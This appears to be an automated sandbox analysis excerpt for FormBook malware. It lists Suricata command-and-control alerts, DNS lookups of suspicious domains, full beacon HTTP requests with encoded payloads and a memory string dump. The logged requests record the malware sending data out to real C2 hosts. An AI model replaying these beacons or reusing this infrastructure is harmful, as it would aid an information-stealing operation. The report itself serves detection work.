Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49835 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49841 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49818 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49823 -> 194.9.94.86:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49827 -> 45.56.79.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49832 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49829 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49830 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49833 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49847 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49814 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49824 -> 45.56.79.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49834 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49844 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49850 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 160.25.166.123:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.furrcali.xyz

Source: Joe Sandbox View	IP Address: 194.9.94.86 194.9.94.86
Source: Joe Sandbox View	IP Address: 160.25.166.123 160.25.166.123
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1

Source: Joe Sandbox View	ASN Name: LOOPIASE LOOPIASE
Source: Joe Sandbox View	ASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /js1x/?v1GdZ=vUN3&AuPF3v=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec= HTTP/1.1Host: www.milp.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /jwa9/?AuPF3v=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&v1GdZ=vUN3 HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /3u0p/?v1GdZ=vUN3&AuPF3v=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ= HTTP/1.1Host: www.mzkd6gp5.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /qps0/?AuPF3v=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&v1GdZ=vUN3 HTTP/1.1Host: www.bokus.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /nkmx/?AuPF3v=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&v1GdZ=vUN3 HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /t3iv/?v1GdZ=vUN3&AuPF3v=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc= HTTP/1.1Host: www.bonheur.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /bwjl/?AuPF3v=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&v1GdZ=vUN3 HTTP/1.1Host: www.rpa.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /kj1o/?v1GdZ=vUN3&AuPF3v=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs= HTTP/1.1Host: www.ogbos88.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA= HTTP/1.1Host: www.100millionjobs.africaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /wbfy/?AuPF3v=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&v1GdZ=vUN3 HTTP/1.1Host: www.mirenzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /kgjj/?v1GdZ=vUN3&AuPF3v=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0= HTTP/1.1Host: www.nextlevel.financeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /k29t/?AuPF3v=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&v1GdZ=vUN3 HTTP/1.1Host: www.furrcali.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /w98i/?v1GdZ=vUN3&AuPF3v=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE= HTTP/1.1Host: www.buyspeechst.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /gcvb/?AuPF3v=R3JWUl3ivpsXcFtCJulnieIWto+O00LjcoMED/ZSuHZ0i4hSpIKzgOSsfpnIAqnHyqi+O0adg4Vr07jACry21CI+4oE0/hewEO2O8KeqeYy4LCD4K2ParBE=&v1GdZ=vUN3 HTTP/1.1Host: www.lejgnu.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /js1x/?v1GdZ=vUN3&AuPF3v=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec= HTTP/1.1Host: www.milp.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /jwa9/?AuPF3v=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&v1GdZ=vUN3 HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /3u0p/?v1GdZ=vUN3&AuPF3v=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ= HTTP/1.1Host: www.mzkd6gp5.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /qps0/?AuPF3v=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&v1GdZ=vUN3 HTTP/1.1Host: www.bokus.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /nkmx/?AuPF3v=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&v1GdZ=vUN3 HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /t3iv/?v1GdZ=vUN3&AuPF3v=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc= HTTP/1.1Host: www.bonheur.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /bwjl/?AuPF3v=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&v1GdZ=vUN3 HTTP/1.1Host: www.rpa.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /kj1o/?v1GdZ=vUN3&AuPF3v=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs= HTTP/1.1Host: www.ogbos88.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Source: cmdkey.exe, 00000004.00000002.110846786441.0000000007F23000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","pat

Source: global traffic	DNS traffic detected: DNS query: www.milp.store
Source: global traffic	DNS traffic detected: DNS query: www.chiro.live
Source: global traffic	DNS traffic detected: DNS query: www.mzkd6gp5.top
Source: global traffic	DNS traffic detected: DNS query: www.bokus.site
Source: global traffic	DNS traffic detected: DNS query: www.elettrocoltura.info
Source: global traffic	DNS traffic detected: DNS query: www.givvjn.info
Source: global traffic	DNS traffic detected: DNS query: www.bonheur.tech
Source: global traffic	DNS traffic detected: DNS query: www.rpa.asia
Source: global traffic	DNS traffic detected: DNS query: www.ogbos88.cyou
Source: global traffic	DNS traffic detected: DNS query: www.smartbath.shop
Source: global traffic	DNS traffic detected: DNS query: www.100millionjobs.africa
Source: global traffic	DNS traffic detected: DNS query: www.mirenzhibo.net
Source: global traffic	DNS traffic detected: DNS query: www.nextlevel.finance
Source: global traffic	DNS traffic detected: DNS query: www.furrcali.xyz
Source: global traffic	DNS traffic detected: DNS query: www.buyspeechst.shop
Source: global traffic	DNS traffic detected: DNS query: www.lejgnu.info

Source: unknown

HTTP traffic detected: POST /jwa9/ HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enConnection: closeCache-Control: no-cacheContent-Length: 203Content-Type: application/x-www-form-urlencodedOrigin: http://www.chiro.liveReferer: http://www.chiro.live/jwa9/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 41 75 50 46 33 76 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 4a 51 5a 33 37 4c 6f 44 49 59 30 2f 43 6e 6b 43 57 72 52 43 67 3d 3d Data Ascii: AuPF3v=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:21:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uon%2FBQspi1fywd9G0%2Bj4UqumOYeRz%2BqnO76zw0jzyn6NedVUHQaNlmf9wKUFSzMro8GmB5DfWFbbOuXrcnpitHiV%2BpPOYSK4OYaeLzMSbP71E%2Fa9Tbd7n5hnngoZGILSWN6C"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901451416c6b82b1-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=100513&min_rtt=100513&rtt_var=50256&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
